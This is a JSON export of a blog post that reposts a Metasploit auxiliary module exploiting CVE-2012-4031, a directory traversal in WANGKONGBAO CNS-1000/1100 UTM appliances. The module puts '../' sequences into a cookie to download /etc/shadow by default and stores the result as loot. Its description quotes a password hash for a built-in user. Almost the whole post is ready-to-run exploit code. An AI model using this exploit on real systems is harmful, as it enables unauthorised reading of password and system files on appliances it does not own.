{"id":59356,"date":"2024-09-01T20:29:42","date_gmt":"2024-09-01T17:29:42","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181173\/wangkongbao_traversal.rb.txt"},"modified":"2024-09-01T20:29:42","modified_gmt":"2024-09-01T17:29:42","slug":"wangkongbao-cns-1000-and-1100-utm-directory-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wangkongbao-cns-1000-and-1100-utm-directory-traversal\/","title":{"rendered":"WANGKONGBAO CNS-1000 And 1100 UTM Directory Traversal"},"content":{"rendered":"<p>##<br \/># This module requires Metasploit: https:\/\/metasploit.com\/download<br \/># Current source: https:\/\/github.com\/rapid7\/metasploit-framework<br \/>##<\/p>\n<p>class MetasploitModule &lt; Msf::Auxiliary<br \/>include Msf::Exploit::Remote::HttpClient<br \/>include Msf::Auxiliary::Report<br \/>include Msf::Auxiliary::Scanner<\/p>\n<p>def initialize(info={})<br \/>super(update_info(info,<br \/>&#8216;Name&#8217; =&gt; &#8216;WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal&#8217;,<br \/>&#8216;Description&#8217; =&gt; %q{<br \/>This module exploits the WANGKONGBAO CNS-1000 and 1100 UTM appliances aka<br \/>Network Security Platform. This directory traversal vulnerability is interesting<br \/>because the apache server is running as root, this means we can grab anything we<br \/>want! For instance, the \/etc\/shadow and \/etc\/passwd files for the special<br \/>kfc:$1$SlSyHd1a$PFZomnVnzaaj3Ei2v1ByC0:15488:0:99999:7::: user<br \/>},<br \/>&#8216;References&#8217; =&gt;<br \/>[<br \/>[&#8216;CVE&#8217;, &#8216;2012-4031&#8217;],<br \/>[&#8216;EDB&#8217;, &#8216;19526&#8217;]],<br \/>&#8216;Author&#8217; =&gt;<br \/>[<br \/>&#8216;Dillon Beresford&#8217;<br \/>],<br \/>&#8216;License&#8217; =&gt; MSF_LICENSE<br \/>))<\/p>\n<p>register_options(<br \/>[<br \/>Opt::RPORT(85),<br \/>OptString.new(&#8216;FILEPATH&#8217;, [false, &#8216;The name of the file to download&#8217;, &#8216;\/etc\/shadow&#8217;]),<br \/>OptInt.new(&#8216;DEPTH&#8217;, [true, &#8216;Traversal depth&#8217;, 10])<br \/>])<br \/>end<\/p>\n<p>def run_host(ip)<br \/># No point to continue if no filename is specified<br \/>if datastore[&#8216;FILEPATH&#8217;].nil? or datastore[&#8216;FILEPATH&#8217;].empty?<br \/>print_error(&#8220;Please supply the name of the file you want to download&#8221;)<br \/>return<br \/>end<\/p>\n<p>travs = &#8220;..\/&#8221; * datastore[&#8216;DEPTH&#8217;]travs = travs[0,travs.rindex(&#8216;\/&#8217;)]\n<p># Create request<br \/>res = send_request_raw({<br \/>&#8216;method&#8217; =&gt; &#8216;GET&#8217;,<br \/>&#8216;uri&#8217; =&gt; &#8220;\/src\/acloglogin.php&#8221;,<br \/>&#8216;headers&#8217; =&gt;<br \/>{<br \/>&#8216;Connection&#8217; =&gt; &#8220;keep-alive&#8221;,<br \/>&#8216;Accept-Encoding&#8217; =&gt; &#8220;zip,deflate&#8221;,<br \/>&#8216;Cookie&#8217; =&gt; &#8220;PHPSESSID=af0402062689e5218a8bdad17d03f559; lang=owned&#8221; + travs + datastore[&#8216;FILEPATH&#8217;] + &#8220;\/.&#8221;*4043<br \/>},<br \/>}, 25)<\/p>\n<p>print_good &#8220;File retrieved successfully&#8221;<\/p>\n<p># Show data if needed<br \/>if res and res.code == 200<br \/>vprint_line(res.to_s)<br \/>fname = File.basename(datastore[&#8216;FILEPATH&#8217;])<\/p>\n<p>path = store_loot(<br \/>&#8216;cns1000utm.http&#8217;,<br \/>&#8216;application\/octet-stream&#8217;,<br \/>ip,<br \/>res.body,<br \/>fname<br \/>)<br \/>print_status(&#8220;File saved in: #{path}&#8221;)<br \/>else<br \/>print_error(&#8220;Nothing was downloaded&#8221;)<br \/>end<br \/>end<br \/>end<\/p>\n","protected":false},"excerpt":{"rendered":"<p>### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule &lt; Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Scanner def initialize(info={})super(update_info(info,&#8216;Name&#8217; =&gt; &#8216;WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal&#8217;,&#8216;Description&#8217; =&gt; %q{This module exploits the WANGKONGBAO CNS-1000 and 1100 UTM appliances akaNetwork Security Platform. This directory traversal vulnerability is interestingbecause the apache server is running as root, this means &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59356","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59356","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59356"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59356\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59356"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}